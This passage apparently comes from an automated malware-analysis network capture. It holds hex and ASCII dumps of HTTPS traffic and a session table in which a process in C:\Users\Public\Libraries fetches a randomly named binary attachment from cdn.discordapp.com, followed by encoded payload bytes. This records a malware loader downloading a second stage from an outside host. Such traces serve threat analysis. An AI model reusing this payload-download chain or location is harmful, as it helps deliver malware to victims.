                                2022-06-26 07:42:48 UTC152INData Raw: c6 c6 66 20 21 83 36 66 c0 38 9e 66 e5 2e 7b 32 5e e9 1d 66 cc 66 1f 66 fd 8f 65 8d 25 55 25 25 7b 8f 25 2e 0d 79 c0 23 da 64 29 49 68 69 49 29 75 7b 32 66 69 49 31 75 2e 0d 5a c0 23 da 66 29 49 34 7f 3a 83 36 9e 66 e5 30 66 11 5e e9 15 2e 7b 32 66 d4 66 17 66 fd 66 28 31 66 b2 66 9e 0d 84 da da da 64 20 1d 66 eb 0d b2 23 da da 66 ed 66 fb 66 9e 0d b9 da da da 64 20 21 68 20 15 75 8f 25 66 20 1d 75 66 20 21 75 8f 25 8f 25 2e 0d 2c be 23 da 66 15 a5 58 2d 25 99 f6 8f da 7b 0d dc c0 23 da 68 20 19 75 66 20 31 75 32 66 20 1d 75 2e 0d a3 09 23 da 66 eb 3a 83 36 66 c0 38 e7 2d 25 68 65 25 2e 7b 32 30 5c e9 f5 23 da da 66 0f 66 1d 0e b6 8f 65 8d 25 35 25 25 8d fe dc 25 25 8f 25 32 0d b9 09 23 da 64 29 49 5e 61 49 25 ea a9 84 25 25 25 66 29 49 eb 69 49 31 8d 68
                                Data Ascii: f !6f8f.{2^fffe%U%%{%.y#d)IhiI)u{2fiI1u.Z#f)I4:6f0f^.{2ffff(1ffd f#fffd !h u%f uf !u%%.,#fX-%{#h uf 1u2f u.#f:6f8-%he%.{20\#ffe%5%%%%%2#d)I^aI%%%%f)IiI1h
                                2022-06-26 07:42:48 UTC155INData Raw: e9 19 2e 7b 32 0e b6 64 38 19 66 d4 64 30 1d 64 20 21 66 20 21 0d e3 dd 23 da 66 20 1d 0d db dd 23 da 0e e5 30 8d a8 b1 1c 25 89 da 55 89 64 45 0e 1b 68 20 19 66 30 21 0d 5e d9 23 da 66 20 19 0d 7e db 23 da 75 66 a2 94 dc 25 25 25 66 f0 d5 ad 1c 25 0d e1 eb 23 da 5e e9 29 66 30 19 66 20 1d 0d 8f 94 23 da 66 fd 26 5e d6 da 50 ea 66 e2 68 29 d5 66 30 19 0d dc d9 23 da c6 10 66 e2 68 29 d5 75 66 a6 df dc 25 25 25 66 20 19 0d db dd 23 da 66 20 1d 0d 73 db 23 da 66 ed de a6 68 20 19 df dc 25 25 25 0d b8 dd 23 da 6b 5e 58 19 25 50 84 0e e5 7f 34 34 89 64 35 8d f9 b1 1c 25 68 20 19 df de 25 25 25 0d a5 8e 23 da 9e c4 d7 d1 23 da c6 c6 3a 83 36 66 c0 38 9e b5 2e 7b 32 30 2c 66 c4 66 ff 64 29 49 68 4e dc 66 fb 66 a0 0d 49 94 23 da 73 60 1b a1 f6 6b 0e da 66 41 49
                                Data Ascii: .{2d8fd0d !f !#f #0%UdEh f0!^#f ~#uf%%%f%#^)f0f #f&^Pfh)f0#fh)uf%%%f #f s#fh %%%#k^X%P44d5%h %%%##:6f8.{20,ffd)IhNffI#s`kfAI
                                2022-06-26 07:42:48 UTC159INData Raw: 25 df f1 d7 1c 25 0d 11 7e 23 da da 10 59 c4 1c 25 da 10 41 c4 1c 25 da 10 25 c4 1c 25 8d 05 d7 1c 25 68 60 99 da da da df 29 25 25 25 0d cc cb 23 da 66 60 99 da da da 0d 4b cd 23 da 75 0d 05 a2 23 da 7e ed 0d 1c 25 da 10 71 c4 1c 25 8d 11 d7 1c 25 da 10 5d c4 1c 25 8d 21 d7 1c 25 da 10 f5 0d 1c 25 68 60 95 da da da df e0 25 25 25 0d 8a cb 23 da 66 60 95 da da da 0d 09 82 23 da 75 7c ed 0d 1c 25 75 0d 7d a2 23 da 7e dd 0d 1c 25 df 6d 3e 65 25 dd dd 0d 1c 25 0d f9 11 da da 7c ed 0d 1c 25 75 0d 9c eb 23 da dd 59 c4 1c 25 df 31 8e 1c 25 0d 63 7e 23 da dd 41 c4 1c 25 df 3d 8e 1c 25 0d 0a 7e 23 da dd 25 c4 1c 25 df 49 8e 1c 25 0d 45 7e 23 da dd 5d c4 1c 25 df 55 8e 1c 25 0d ec 7e 23 da dd 71 c4 1c 25 df 65 8e 1c 25 0d 27 7e 23 da dd f5 0d 1c 25 df 71 8e 1c 25
                                Data Ascii: %%~#Y%A%%%%h`)%%%#f`K#u#~%q%%]%!%%h`%%%#f`#u|%u}#~%m>e%%|%u#Y%1%c~#A%=%~#%%I%E~#]%U%~#q%e%'~#%q%
                                2022-06-26 07:42:48 UTC163INData Raw: 1c 25 7c ed 0d 1c 25 75 0d 2c 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d a8 01 da da 8d e5 db 1c 25 7c ed 0d 1c 25 75 0d 08 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 84 01 da da 7c ed 0d 1c 25 75 0d bb db 23 da dd 59 c4 1c 25 df 09 db 1c 25 0d ee 6e 23 da 68 60 99 d8 da da 94 f9 8e 1c 25 66 f0 59 c4 1c 25 0d 90 70 23 da 66 60 99 d8 da da 0d 83 72 23 da 66 f5 68 60 9d d8 da da 0d 64 b9 23 da 66 60 9d d8 da da df 25 a5 25 25 0d cc 43 da da 7e ed 0d 1c 25 8d 0d db 1c 25 7c ed 0d 1c 25 75 0d d1 db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 4d 01 da da 8d 21 db 1c 25 7c ed 0d 1c 25 75 0d ad db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 29 01 da da 8d 31 92 1c 25 7c ed 0d 1c 25 75 0d 89 db 23 da 7e dd 0d 1c 25
                                Data Ascii: %|%u,#~%M>e%%%|%u#~%M>e%%|%u#Y%%n#h`%fY%p#f`r#fh`d#f`%%%C~%%|%u#~%M>e%%M!%|%u#~%M>e%%)1%|%u#~%
                                2022-06-26 07:42:48 UTC167INData Raw: 1c 25 a9 25 a9 25 25 25 a5 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 25 39 25 39 25 39 25 39 dc a9 67 a9 dc 2b 67 2b 25 41 25 41 25 25 25 39 e2 a5 22 a5 e2 27 22 27 25 25 25 25 25 25 25 25 25 25 25 25 2d 25 2d 25 25 25 25 25 25 25 25 25 25 25 25 25 35 1c c5 dc 3d dc 45 dc 09 45 09 45 da da 25 25 25 25 25 25 25 25 25 25 da da da da da da 35 dc 25 25 08 e0 1a 25 1a 27 1a 25 1a 27 1a 25 1a 25 1a 25 1a 27 35 dc da da da da da da da da da da da da da da fe 65 fe 65 fe 27 fe 27 da da da da da da da da 1a 25 1a 27 0a 25 1a 27 18 25 18 25 1a 25 1a 25 25 25 25 a5 25 a5 25 a5 25 25 25 25 da da da da da da da da da da da da da da da da da da da da 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 02 67 1a 25 1a 25
                                Data Ascii: %%%%%-%-%-%-%-%-%-%-%%9%9%9%9g+g+%A%A%%%9"'"'%%%%%%%%%%%%-%-%%%%%%%%%%%%%5=EEE%%%%%%%%%%5%%%'%'%%%'5ee''%'%'%%%%%%%%%%%%%EEEEEEEEEEEEEEEEg%%
                                2022-06-26 07:42:48 UTC171INData Raw: 25 25 71 4a 3e 3c 91 1c 91 91 4a 3e 25 25 25 25 22 40 99 79 44 3e 46 1e 4a 50 93 99 25 25 25 25 2c 50 40 97 54 75 40 97 8b 4a 97 48 3c 93 3e 40 1e 4a 50 93 99 40 97 25 25 25 22 40 99 7b 40 97 4e 44 4a 93 25 25 25 25 22 40 99 1e 50 97 97 40 93 99 79 8d 97 40 3c 89 24 89 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 69 40 3e 97 40 48 40 93 99 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 24 93 3e 97 40 48 40 93 99 25 25 25 25 7b 44 97 99 50 3c 91 2c 50 40 97 54 25 25 25 25 32 44 89 40 1e 8d 3c 97 79 4a 28 50 91 99 44 67 54 99 40 25 25 25 28 50 91 99 44 67 54 99 40 79 4a 32 44 89 40 1e 8d 3c 97 25 25 25 91 4e 99 97 91 40 93 1c 25 25 25 25 91 4e 99 97 3e 95 54 93 1c 25 25 25 71 4a 3c 89 71 44 87 97 3c 97 54 20 9d 1c 25 25 25 25 22 40 99 79 8d 97 40 3c 89 71 4a
                                Data Ascii: %%qJ><J>%%%%"@yD>FJP%%%%,P@Tu@JH<>@JP@%%%"@{@NDJ%%%%"@P@y@<$%%%%$@J>F@i@>@H@%%%%$@J>F@$>@H@%%%%{DP<,P@T%%%%2D@<yJ(PDgT@%%%(PDgT@yJ2D@<%%%N@%%%%N>T%%%qJ<qD<T %%%%"@y@<qJ
                                2022-06-26 07:42:48 UTC175INData Raw: 59 f5 59 f9 59 fd 59 01 59 05 59 09 59 0d 59 11 59 21 59 41 10 49 10 4d 10 51 10 55 10 59 10 5d 10 61 10 65 10 69 10 7d 10 9d 10 a5 10 a9 10 ad 10 b1 10 b5 10 b9 10 bd 10 c1 10 c5 10 d9 10 f9 10 01 10 05 10 09 10 0d 10 11 10 15 10 19 10 1d 10 21 10 35 5b 55 5b 5d 5b 61 5b 65 5b 69 5b 6d 5b 71 5b 75 5b 79 5b 7d 5b 95 5b b5 5b bd 5b c1 5b c5 5b c9 5b cd 5b d1 5b d5 5b d9 5b dd 5b ed 5b 0d 5b 15 5b 19 5b 1d 5b 21 5b 25 12 29 12 2d 12 31 12 35 12 49 12 69 12 71 12 75 12 79 12 7d 12 81 12 85 12 89 12 8d 12 91 12 a1 12 c1 12 c9 12 cd 12 d1 12 d5 12 d9 12 dd 12 e1 12 e5 12 e9 12 fd 12 1d 12 25 5d 29 5d 2d 5d 31 5d 35 5d 39 5d 3d 5d 41 5d 45 5d 5d 5d 7d 5d 85 5d 89 5d 8d 5d 91 5d 95 5d 99 5d 9d 5d a1 5d a5 5d b9 5d d9 5d e1 5d e5 5d e9 5d ed 5d f1 5d f5 5d f9 5d
                                Data Ascii: YYYYYYYYY!YAIMQUY]aei}!5[U[][a[e[i[m[q[u[y[}[[[[[[[[[[[[[[[[[![%)-15Iiquy}%])]-]1]5]9]=]A]E]]]}]]]]]]]]]]]]]]]]]]]
                                2022-06-26 07:42:48 UTC180INData Raw: e9 14 f5 14 f9 14 09 14 11 14 15 14 19 14 1d 14 21 14 25 5f 29 5f 2d 5f 31 5f 35 5f 39 5f 3d 5f 41 5f 45 5f 49 5f 4d 5f 51 5f 55 5f 59 5f 5d 5f 61 5f 65 5f 69 5f 6d 5f 71 5f 75 5f 79 5f 7d 5f 81 5f 85 5f 89 5f 8d 5f 91 5f 95 5f 99 5f 9d 5f a1 5f a5 5f a9 5f ad 5f b1 5f bf 5f d1 5f df 5f e3 5f f5 5f c4 5f 19 5f 29 16 39 16 41 16 45 16 49 16 4d 16 51 16 55 16 59 16 5d 16 61 16 65 16 69 16 6d 16 71 16 75 16 79 16 7d 16 81 16 85 16 89 16 8d 16 91 16 95 16 99 16 9d 16 a1 16 a5 16 a9 16 ad 16 b1 16 b5 16 b9 16 bd 16 c1 16 c5 16 c9 16 cd 16 d1 16 d5 16 d9 16 dd 16 e1 16 e5 16 e9 16 ed 16 f1 16 f5 16 f9 16 09 16 d0 16 d4 16 31 61 51 61 59 61 5d 61 61 61 65 61 69 61 6d 61 71 61 75 61 79 61 7d 61 81 61 85 61 89 61 8d 61 91 61 95 61 a1 61 c1 61 c9 61 cd 61 d1 61 d5
                                Data Ascii: !%_)_-_1_5_9_=_A_E_I_M_Q_U_Y_]_a_e_i_m_q_u_y_}_____________________)9AEIMQUY]aeimquy}1aQaYa]aaaeaiamaqauaya}aaaaaaaaaaaa
                                2022-06-26 07:42:48 UTC184INData Raw: 4e ac 99 59 ea 38 a5 bb c7 46 ac 3f d9 43 18 a5 db c7 82 ac 26 0d 50 99 25 58 af b3 3e a5 ac 0c 33 8b b1 b4 3c 81 b1 62 20 85 64 7d 3f 4b a2 3b 3e c0 7d 10 7b 6a 10 3e f8 7d 12 9b f0 f6 e5 c3 3c ca 2d 49 27 66 a5 ee 11 2d 83 a9 35 e7 91 a7 b5 b5 22 7d 71 7d 1e cd 00 11 fe d9 37 df 2d 32 e4 5e a9 0c e7 02 47 6e cd 2a d9 00 9f 37 d4 e9 9d 87 5f 8c b5 7d 6b d1 4b 13 fc 43 fc c3 00 83 02 33 ee 3a 6e 6d 49 33 a4 b7 09 73 2f fc 00 b5 57 24 e6 24 46 6d b6 6d 08 c9 2e c9 63 f7 35 44 c1 71 4b c6 b5 48 a4 03 09 2d d7 a5 d1 45 72 6c 92 b5 ea b5 2a b7 d6 a4 9e 09 92 39 5f a0 ad 07 71 e4 c7 49 77 c9 b9 37 6f 10 40 1a c0 29 80 7a 57 67 74 c5 cf 2c a8 84 c3 f9 2d cf ad 5f 7a 7f 24 48 c5 9b 75 0a 2e 62 84 ee 59 50 bf 00 a8 76 3b 1e a6 c9 08 7e b0 f5 bf 44 42 44 d2 8d 0a
                                Data Ascii: NY8F?C&P%X>3<b d}?K;>}{j>}<-I'f-5"}q}7-2^Gn*7_}kKC3:nmI3s/W$$Fmm.c5DqKH-Erl*9_qIw7o@)zWgt,-_z$Hu.bYPv;~DBD
                                2022-06-26 07:42:48 UTC187INData Raw: fc 57 57 f7 82 f9 23 51 2d e9 c7 0c 6f ad c7 ad 7b 86 00 16 56 e0 6c 6c 6c 63 e6 c8 ba 25 15 7f ee ac ac 2c 39 3b d3 d2 df 10 2a 31 85 37 86 fe 10 10 b0 25 f1 e0 19 21 12 88 ee 95 1f 2e e7 2b c1 e2 cb d8 22 35 f3 d6 0c eb da 27 d6 1a b6 1a de 25 6d ce 17 f3 d8 ac e7 61 25 25 25 25 24 20 73 69 d3 67 85 a7 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25


                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                                2          | 192.168.2.3 | 49745       | 162.159.133.233 | 443              | C:\Users\Public\Libraries\Eluiezilfw.exe
                                Timestamp               | kBytes transferred | Direction | Data
                                2022-06-26 07:43:09 UTC | 331                | OUT       | GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: 16
                                Host: cdn.discordapp.com
                                Cache-Control: no-cache
                                2022-06-26 07:43:09 UTC | 331                | IN        | HTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:43:09 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144f71797c5c85-FRA
                                Accept-Ranges: bytes
                                Age: 3086
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:43:09 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: HIT
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdtJ7t9fCETp7UygsO08dpsnNnPY5cqzUa7Rm36R-2-yoeBJxLn_rXiCmsw2Ou5CLTbZXuNNnlYW7HZr2ZJiNfBM0vIyGhBb
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F7V%2B7cVzdxh9zuxlufANpShCCOFVhVgCy2aOmOiTNIaOzcSNPORQiutEtennUmotp1aGvpQi%2FPkG2W4fv31d3S60A7tQVDudvVi2V5%2FXJIBolE1brOfDeVQMn%2Fp5HmMUZcXyFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-06-26 07:43:09 UTC | 333                | IN        | Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-06-26 07:43:09 UTC342INData Raw: 59 65 25 25 25 a0 53 e1 c7 8c 12 65 25 25 65 9b 5f 46 e6 03 5f 65 25 25 0d 64 29 fe a2 af 63 65 25 25 87 d1 a0 c6 9d 88 1c 65 25 a5 9f f2 92 4b b2 fd 69 65 25 b5 d1 93 57 9d ab 62 6d 65 25 d9 32 2f 1a 3b 8d 84 26 65 25 7c c8 f1 f3 f6 e7 ae 73 65 c5 a9 39 65 3c 2c 34 a9 77 65 ed 80 f4 b5 94 80 4a 80 30 65 5f ea 45 19 02 6a a6 f3 7d 65 a9 e4 b9 1d 9d 14 1a 5c 81 65 c0 e6 94 5b b2 e2 6a 7c 3a 65 ba 73 42 29 a8 a4 17 a4 87 65 bb 47 5c 20 65 a1 4a 21 40 65 c3 90 95 06 cd 88 a0 78 44 65 b0 cb aa da 24 fa 9d e7 ae 65 7e 39 76 a0 3b 86 8e ca 18 1c 05 b1 c4 a5 a4 22 df 6e cd 1c cf f2 0b 5a 06 7c 3b db 37 67 46 30 02 14 68 d2 95 05 a1 67 55 a4 61 be da bb 77 af c2 67 b3 03 d4 78 d6 c6 a3 cf 2c 1e b1 0a 8f 81 f4 21 4b f7 96 1e 9b be f1 17 04 0a a9 5c 4b 69 f7 2f b5
                                Data Ascii: Ye%%%Se%%e_F_e%%d)ce%%e%Kie%Wbme%2/;&e%|se9e<,4weJ0e_Ej}e\e[j|:esB)eG\ eJ!@exDe$e~9v;"nZ|;7gF0hgUawgx,!K\Ki/
                                2022-06-26 07:43:09 UTC344INData Raw: 7b 8b 66 57 8b e4 1b 99 f2 8b 5c 23 25 e5 4e 35 75 66 25 0d 9d da da da 7d 99 e0 64 cc 83 da bc 83 66 2d da 3c 15 9e b5 77 2c 2e a9 f7 a1 de da 75 19 0c f7 68 71 49 35 89 66 3f 64 f4 64 44 2d a2 1c 29 f4 12 65 25 64 1c 31 89 64 2f 36 34 7f 9e c4 5f dc 25 25 66 69 49 51 66 65 31 60 e5 99 33 66 2d d7 5c 75 da 2c 21 7d 0d e4 25 25 25 0d cd 27 25 25 9e 68 65 25 66 35 da 77 1d 9e 66 e5 2e 66 fd 66 9e 66 35 da 77 09 66 9e 36 9e 66 e5 a9 f7 5a dc 9e 75 77 66 35 da 77 0d 7f 7d 9e b5 a5 18 4d e5 1c 25 dc 9b ec 8f 25 8f 25 8f 25 8d ba 1f c8 33 da f0 39 05 1c 25 9e b5 a5 18 4d e5 1c 25 25 99 f2 75 75 77 79 8f 27 8f 25 8d 09 1f c8 33 da f0 39 05 1c 25 5e e9 2d 7d 9e 68 65 25 79 8f dc 8f 25 8d 05 1f c8 33 da f0 39 05 1c 25 5e e9 29 7d 9e 68 65 25 a5 18 4d e5 1c 25 dc
                                Data Ascii: {fW\#%N5uf%}df-<w,.uhqI5f?ddD-)e%d1d/64_%%fiIQfe1`3f-\u,!}%%%'%%he%f5wf.fff5wf6fZuwf5w}M%%%%39%M%%uuwy'%39%^-}he%y%39%^)}he%M%
                                2022-06-26 07:43:09 UTC345INData Raw: 65 29 64 20 21 0e e5 30 8d 38 61 65 25 89 da 55 89 64 45 60 b6 a3 f6 26 64 83 31 66 20 21 66 69 fd 29 64 20 1d 5e 58 1d 25 99 de da 30 1d 60 b6 5a c0 0e e5 7f 34 34 89 64 35 c6 39 c4 1b d6 da da 0d 7c da da da 0d 9d d8 da da 0d a2 d8 da da 3a 83 36 34 34 38 9e 30 66 11 5e e9 1d 2e 7b 32 9a 5d 0b 1c 25 66 22 2d 60 e5 99 79 66 55 0e b6 66 65 29 64 20 21 0e e5 30 8d a8 61 65 25 89 da 55 89 64 45 16 ce a3 3f 66 20 21 66 29 fd 64 20 1d 1e 64 3a 31 5e 58 1d 25 99 de da 30 1d 16 ce 5a 0b 0e e5 7f 34 34 89 64 35 c6 39 c4 ab d6 da da 0d 0c da da da 0d 2d d8 da da 0d 32 d8 da da 3a 83 36 34 34 38 9e 2c 7b 32 e3 5d 0b 1c 25 68 58 e9 94 e6 25 25 25 ce 80 6a e0 7d 0b 1c 25 6a e0 79 0b 1c 25 64 08 71 0b 1c 25 64 f8 75 0b 1c 25 7e 65 0b 1c 25 64 f0 6d 0b 1c 25 68 28 e9
                                Data Ascii: e)d !08ae%UdE`&d1f !fi)d ^X%0`Z44d59|:64480f^.{2]%f"-`yfUfe)d !0ae%UdE?f !f)d d:1^X%0Z44d59-2:6448,{2]%hX%%%j}%jy%dq%du%~e%dm%h(
                                2022-06-26 07:43:09 UTC346INData Raw: 0d 7c f5 da da 38 e7 29 25 b5 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a9 23 da da c6 3a 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da ea 25 25 0d a9 da da da 66 fd 60 b6 a1 ea 68 79 49 29 66 a2 66 a6 0d 1c da da da c6 51 66 b8 de b6 66 a2 66 ae 0d 57 29 25 25 7b 66 e2 66 71 49 29 66 ae 0d 79 da da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d ee 29 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 77 64 07 94 dc 25 25 25 0d d6 23 da da 7f 9e b5 0c a4 60 f7 99 fc 77 5f 2f 99 f2 5f 6f dc 99 ec 5f 6f 27 99 e6 5f 6f de 99 e0 5e e7 29 c6 0d 67 67 67 64 ac 7f 04 ac c4 f1 23 da da 9e 68 65 25 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29 99 33 8b 16 6f 2b 99 e0 5e e7 2d c6 09 5e e7 27 5e e7 27
                                Data Ascii: |8)%.{20\)u^!fd9If`Zf#:h\%%XM{hiI-fqI)%%f`hyI)ffQfffW)%%{ffqI)fyf`X'ff)%%\)5%%8:6wd%%%#`w_/_o_o'_o^)gggd#he%`w/Eo'o)3o+^-^'^'
                                2022-06-26 07:43:09 UTC348INData Raw: 25 25 25 75 0d a9 a6 da da 5e 9e 29 73 50 0d 83 36 9e 68 65 25 60 f7 ea a9 e1 da da da 66 6f 21 ac c4 ea a9 8c da da da 2c 77 75 0d 30 a6 da da 60 e5 ea a9 4c da da da 9e 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a5 da da da c6 38 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da e2 25 25 0d 41 1f da da 66 fd 60 b6 a3 ea 68 79 49 29 66 a2 66 a6 0d 14 25 25 25 c6 4f 66 b8 66 a2 66 ae 0d ad dc 25 25 7b 66 e2 66 71 49 29 66 ae 0d 13 d4 da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d 44 dc 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 66 e5 60 a4 ea a9 31 da da da 75 2c 77 0d cd ef da da 60 e5 ea a9 f1 23 da da 7f da 57 64 27 0d cb ef da da 9e b5 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29
                                Data Ascii: %%%u^)sP6he%`fo!,wu0`L.{20\)u^!fd9If`Zf8h\%%XM{hiI-fqI)%%Af`hyI)ff%%%Offf%%{ffqI)ff`X'ffD%%\)5%%8:6f`1u,w`#Wd'`w/Eo'o)
                                2022-06-26 07:43:09 UTC349INData Raw: da da da 2a 5a 0d 38 c6 57 30 64 b0 64 fd de 81 53 27 64 17 0d fa da da da 2a 5a 15 38 c6 41 66 de 5e 9e 29 0d 42 33 25 25 2a 5a ce c6 e8 66 de 5e 9e 29 0d 45 e2 25 25 2a 5a ce 3a 83 36 9e b5 5e 18 3d e5 1c 25 25 99 e2 da f0 3d e5 1c 25 9e d5 35 0d 60 03 da da 9e 2e 7b 32 30 64 9e 64 fb 0c e5 af 1c dc 68 a1 2d 2f 66 4a 21 0c e5 66 2a 1d 2c 66 2a 29 04 9c a3 e6 64 e7 dc 15 dc ff 0d 1d 03 da da 66 22 29 66 f2 66 37 af 2f a5 d4 2f 99 0c a5 d4 e6 99 18 a5 d4 31 99 24 a5 d4 e8 99 30 a5 d4 33 99 95 a5 d4 ea ea a9 a5 25 25 25 a5 d4 ec ea a9 ad 25 25 25 d5 27 38 3a 83 36 c4 f4 03 da da 66 39 55 dc fd 0d 5e ce da da dd 29 25 25 25 c6 58 66 39 55 dc fd 0d 03 d4 da da dd 29 25 25 25 c6 91 68 39 55 dc fd 0d 2c da da da dd 35 25 25 25 c6 36 0c a4 af 6f dc da 99 ec 27
                                Data Ascii: *Z8W0ddS'd*Z8Af^)B3%%*Zf^)E%%*Z:6^=%%=%5`.{20ddh-/fJ!f*,f*)df")ff7//1$03%%%%%%'8:6f9U^)%%%Xf9U)%%%h9U,5%%%6o'
                                2022-06-26 07:43:09 UTC350INData Raw: 66 3d 60 b6 5a f6 60 b6 58 e2 d5 29 0d 97 b4 da da 66 20 21 66 30 1d 0d 9a da da da c4 3e dc 25 25 0e da 5e 58 0d 25 99 e8 5e 48 0d 29 66 20 0d 66 5d 5e 48 0d 29 66 20 1d ea db 65 dc dc 20 1d 66 20 1d 66 95 27 66 75 2b 60 f7 99 e2 66 27 64 20 1d c6 e0 0e e5 64 20 1d 66 9e d2 13 64 20 11 66 20 11 74 d2 d6 16 15 99 e2 d5 29 0d 37 b4 da da 5e 20 11 2d 5e 58 0d 25 99 2d 66 20 0d 5e 5d dc 50 61 66 20 0d 64 20 09 16 d6 a3 fa 5e 58 1d 25 99 f4 66 20 0d 5e e5 2d 66 ae ea 8a fb de e7 66 aa 06 a6 66 30 1d 0d 02 da da da 68 20 09 66 30 11 0d ed b2 da da 66 20 09 64 20 0d c6 3e 66 20 0d da 2d 66 20 11 0d 3e b2 da da 64 20 0d 64 58 15 16 38 15 58 de 64 38 15 5e 58 1d 25 99 51 66 30 15 ea 8a fb 66 20 0d 5e e5 2d 0e a4 0d 65 01 da da 66 20 15 75 66 30 21 66 37 66 20 0d
                                Data Ascii: f=`Z`X)f !f0>%%^X%^H)f f]^H)f e f f'fu+`f'd d fd f t)7^ -^X%-f ^]Paf d ^X%f ^-fff0h f0f d >f -f >d dX8Xd8^X%Qf0f ^-ef uf0!f7f
                                2022-06-26 07:43:09 UTC352INData Raw: 0d e0 25 25 25 68 60 ba 23 da da df e0 dc 25 25 0d 5c d8 da da 68 20 0d 75 68 20 13 75 8f 25 8f 25 68 60 ba 23 da da 75 66 20 1d 75 0d 04 96 da da 60 e5 99 47 68 20 0d 75 68 20 13 75 8f 25 8f 25 8d f1 7d 65 25 66 20 1d 75 0d e6 96 da da 60 e5 99 29 eb 20 13 25 eb 20 17 25 0e e5 7f 34 34 89 64 35 8d 32 32 65 25 66 20 1d 75 0d b4 df da da 9e c4 0a 07 da da c6 ca 8d e0 dc 25 25 66 20 21 75 68 60 ba 23 da da 75 0d c9 df da da 8f e0 68 20 ce 75 8f de 0d 5a df da da 75 0d 2c df da da 0e b6 a5 98 ba 23 da da 25 ea a9 d4 25 25 25 a5 58 ce 25 50 2f a5 58 13 25 ea a9 c4 25 25 25 68 60 ba 23 da da 75 0d 93 df da da 68 70 ba 23 da da de e7 64 20 09 c6 de da 28 09 66 20 09 a5 5d 53 99 e6 68 60 ba 23 da da 16 20 09 50 0f 68 60 ba 23 da da 16 20 09 ea a9 86 25 25 25 da
                                Data Ascii: %%%h`#%%\h uh u%%h`#uf u`Gh uh u%%}e%f u`) % %44d522e%f u%%f !uh`#uh uZu,#%%%%X%P/X%%%%h`#uhp#d (f ]Sh`# Ph`# %%%
                                2022-06-26 07:43:09 UTC353INData Raw: 5e e9 15 2e 7b 64 28 19 64 30 1d 64 20 21 5e 58 19 25 50 2f 0e e5 64 20 15 c4 e4 dc 25 25 a2 20 15 da da da da 0e e5 0e 1b 5e 58 21 25 ea a9 84 25 25 25 c4 a7 25 25 25 66 30 19 0e a4 af 31 57 6b 1b 9c a5 99 91 16 50 2d ea 5e fd 25 25 25 5e bc 1a 1b 9c 45 99 53 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 96 25 25 25 16 50 2d ea 5e d7 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b e6 ac 66 ef 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 68 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b 8b e6 ac 66 28 21 8b 64 39 1c c6 e2 66 30 21 8b 64 31 67 65 16 50 2d 4e e4 16 20 1d ea a7 95 da da da 16 20 1d 97 29 66 20 1d 6d 66 30 21 8b a2 29 67 25 25 c6 22 16 50 2d 4e 67 66 30 19 af 39 57 6b 1b e7 a5 99 55 16 50 2d 4e 10 a5 07 1a 1b e7 45 99 39 66 30 19 af 39
